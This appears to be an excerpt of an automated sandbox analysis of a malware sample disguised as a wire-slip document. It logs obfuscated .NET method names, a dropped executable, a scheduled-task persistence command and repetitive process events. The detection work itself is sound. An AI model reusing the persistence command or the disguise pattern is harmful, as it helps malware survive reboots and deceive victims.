                      Source: 0.2.Wire slip account payable.pif.exe.77c0000.4.raw.unpack, bDIIAMUfPaTxjCX7Zs.csHigh entropy of concatenated method names: 'jbIfbsqMYQ', 'Nt6fZ3ZatT', 'SMmfVR9iZT', 'C3xfuKCPV4', 'USvf0eIgss', 'k2Qfh2HMaL', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, ODaaLEmxZhSc3dyCQm.csHigh entropy of concatenated method names: 'aU3Vgk3KuE', 'vwiVHDuh7R', 'QHxVZ2iZ1o', 'LRTVu1uIff', 'a6PVhqngai', 'vUWZWbB14T', 'Bs0Z5yE0RX', 'gpEZ3ZZX1s', 'hSFZcjy6sZ', 'OGeZThLCse'
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, jPw0qgzscD9FJa72lx.csHigh entropy of concatenated method names: 'gLwfv0j93H', 'hlufnkrMNu', 'rAgflIYoLM', 'BhpfmbJoGX', 'QRLfsXqsSH', 'fxZf9edMu4', 'Tw7fjCWtac', 'Lmufqn55fN', 'FvTfQRb4ql', 'NGWfydvahw'
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, RuSwETDEJQv2nUAfUA4.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ykVfFVPUc6', 'SDjf15p3T8', 'a9jfJdtH3X', 'uHhfrOLmBx', 'XUYfwI5vhr', 'MUmfaAdAZi', 'e21f2a9O0L'
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, pBxTATDDe0IEkvu86CL.csHigh entropy of concatenated method names: 'h7ofUM9lh3', 'L7Ufzl0mXK', 'WFwoEPdonK', 'Hq4oDC3VL3', 'q0AoX4jxxj', 'l0Aopg1SNa', 'L93okQ52js', 'Bpwogtmy3B', 'brKoSxLNY8', 'j0yoHtgx8T'
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, aIySoVaM59biZ07pMc.csHigh entropy of concatenated method names: 'ToString', 'YD0BFA0ifY', 'uNKBsLoFwP', 'SaYB6IGSO7', 'xKaB9xhFtv', 'xf9BjSoSXd', 'xZMBMFP1B4', 'nILBOS4SCN', 'pTXBi779mU', 'QKkBNOUREb'
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, oYrUFM59tbVRIsk3J0.csHigh entropy of concatenated method names: 'JvcLcxKAOT', 'VddLUEQ3i7', 'cv4REJ3AOv', 'XvKRDR4d5p', 'BS9LF6dMqR', 'krrL1bfMXN', 'MxvLJR6dFI', 'WY4LrEnQrN', 'BSjLwWKsmN', 'xB1LafCBqg'
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, rekgrBHhNjMSuwg2X1.csHigh entropy of concatenated method names: 'Dispose', 'c9vDTB3tp3', 'zeQXsMf2Z8', 'rQUdIpr0pb', 'qUZDU1GViN', 'PpNDzqJjFs', 'ProcessDialogKey', 'VCYXEvvLix', 'Lv7XDc8Tnn', 'TfmXXDDIIA'
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, lZY9ig2UjcAbtXWD2r.csHigh entropy of concatenated method names: 'yyTLCYCKnr', 'odbLdvCr9j', 'ToString', 'NOsLSkrn80', 'rjlLHha6mD', 'clDLbEACu1', 'AiILZD3bxp', 'GnTLVc9ZNV', 'C6qLus3CQa', 'pBdLh9nD5R'
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, pZVbNXDkSmntCVBLyS7.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eDS408djmH', 'olK4fM4PZC', 'f294osP2xG', 'zuj44oo8gq', 'Eed4GBmsoW', 'inI4KIUQvU', 'lmF4quPnZn'
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, gNRWAGnXV8menB1Yeo.csHigh entropy of concatenated method names: 'qOXHrN3M3U', 'oeLHwV3318', 'QYaHan0Mli', 'EWQH2LVbC7', 'VgOHWwrfFN', 'jGHH5mfvAw', 'kajH3yqfkE', 'sgcHcXRkRV', 'gvlHT5cErU', 'lsQHUVofMs'
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, gL074BhmJSaIe9Ktd1.csHigh entropy of concatenated method names: 'd3TpgMAb2N', 'kB5pS8hIgE', 'sutpHIUnpP', 'A4mpbP4d5i', 'wfhpZSjIO2', 'Pd9pVSK2rc', 'fUqpum1tWZ', 'qC6phwaJNa', 'IS1p7XRvQ5', 'DnepCLJrSZ'
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, CTYMvBkFF3Ro4mtHA4.csHigh entropy of concatenated method names: 'pxbDuNRWAG', 'cV8DhmenB1', 'XawDCmJu97', 'KJ3DdO8IQj', 'dm1Dx65FDa', 'SLEDBxZhSc', 'njTgAV96U26JDjZu9j', 'vYaVdhMaAEnToVIVST', 'RgqDDeNTDs', 'DwKDphN2gd'
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, TdqXBTlawmJu97MJ3O.csHigh entropy of concatenated method names: 'zQTb81GNmm', 'GqJbvlbCWt', 'Xr9bnwwsSq', 'vLdbl4ZGPo', 'MLrbxZJW8X', 'rlobB8mYam', 'y5fbLCW7eo', 'iNmbRpFNgw', 'yKCb05p8bo', 'gFYbf5RCtA'
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, iGIEem3Xqp9vB3tp3R.csHigh entropy of concatenated method names: 'qpS0x9xNLr', 's8u0LpaoEH', 'wqW00F0tEk', 'S910oAYs2C', 'rmQ0GWqwtO', 'vrB0qtrAGZ', 'Dispose', 'NamRSdm9I6', 'ND4RHHLyUW', 'wV3RbQVD8J'
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, XFOAcwJ618FHIGWr3u.csHigh entropy of concatenated method names: 'mDsenSSHLE', 'yjqelaWwlE', 'Ymhemi71E9', 'ITTesoaMSd', 'P44e9YAJsd', 'oNQejHLSUt', 'AwNeOC1IZq', 'svTeifgrC9', 'FSSetLg6Eo', 'qGbeFdU3Hr'
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, xGhgXlOC1DK2px56Aa.csHigh entropy of concatenated method names: 'eV7uS3f3Td', 'uaUubO5l4R', 'CWkuVNWrHN', 'tOdVUKNULR', 'mB8VzsVlVG', 'lYiuE3lmpZ', 'WdAuD054dr', 'uHFuX83H5a', 'EckuphHQUY', 'gihukPEMwO'
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, NoJi4OX1MUCXoXy5rE.csHigh entropy of concatenated method names: 'B49P6S0HX', 'M7c8jHZmJ', 'gXYvox06X', 'SeeYsCIlR', 'mtjl380MW', 'B1rAI41En', 'DgWnHiB8Hnlwk5vNn9', 'oMmxM76FBoPeIKrmj9', 'pfZRTvmeK', 'MNwfRIshE'
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, DvvLixTOv7c8Tnn2fm.csHigh entropy of concatenated method names: 'ag80mIF09b', 'zZ20sZcnS9', 'Klm06Fw7Z2', 'zYB09J8DuH', 'pmx0jnuyn0', 'QiS0MPZwme', 'GI80O7jYm8', 'CmU0ifDS6W', 'P5y0NJZb8K', 'FZC0t3NqGO'
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, KJMhUlN5vVjFh8WZp0.csHigh entropy of concatenated method names: 'Xr4uQm5gj0', 'sHguyj1vyq', 'AF1uPUq4cQ', 'Iupu8R3sZ9', 'JkvuIrayYW', 'ftfuvaqHYC', 'x4KuYsSR2F', 'yUaunKDnfr', 'THfulcUUHP', 'nK4uACoetJ'
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, Y7rgi5955mXeMWQUG8.csHigh entropy of concatenated method names: 'P1CVqSiccR', 'PANVQ9oK96', 'ouZVPbmK2G', 'D6NV84Etso', 'IWVVvKrWoa', 'CWjVYROIyA', 'wfnVl543PY', 'zdDVAJF9Rw', 'I2yg7IbQTrSA4Ws3fCJ', 'jwBO6tb4GWPklLaEhXh'
                      Source: 0.2.Wire slip account payable.pif.exe.3fd8bd0.1.raw.unpack, bDIIAMUfPaTxjCX7Zs.csHigh entropy of concatenated method names: 'jbIfbsqMYQ', 'Nt6fZ3ZatT', 'SMmfVR9iZT', 'C3xfuKCPV4', 'USvf0eIgss', 'k2Qfh2HMaL', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeFile created: C:\Users\user\AppData\Roaming\EQVRGq.exeJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\EQVRGq" /XML "C:\Users\user\AppData\Local\Temp\tmp14C9.tmp"

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
